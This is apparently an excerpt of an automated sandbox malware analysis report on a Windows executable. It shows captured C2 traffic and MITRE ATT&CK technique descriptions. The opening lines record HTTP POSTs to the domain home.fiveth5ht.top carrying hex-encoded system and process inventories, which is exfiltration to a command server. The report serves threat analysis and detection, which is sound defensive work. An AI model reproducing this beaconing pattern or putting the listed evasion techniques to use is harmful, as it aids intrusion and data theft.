Source: global traffic	HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: /Content-Type: application/jsonContent-Length: 443559Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 31 35 37 33 34 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global traffic	HTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: /
Source: global traffic	HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fiveth5ht.top

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
Tactics:	Lateral Movement
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report OoYYtngD7d.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
OoYYtngD7d.exe

Function 0047255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282
fileCOMMON

Function 004729FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Function 004805B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377
networkCOMMON

Function 0053B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Function 00539740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743
registryCOMMON

Function 004A8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269
networkCOMMON

Function 00472F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144
registryCOMMON

Function 004776A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73
networkCOMMON

Function 004A9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Function 00477770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Function 004775E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Function 004AA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Function 0048D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
networkCOMMON

Function 0053AA30 Relevance: 4.9, APIs: 3, Instructions: 377
networkCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre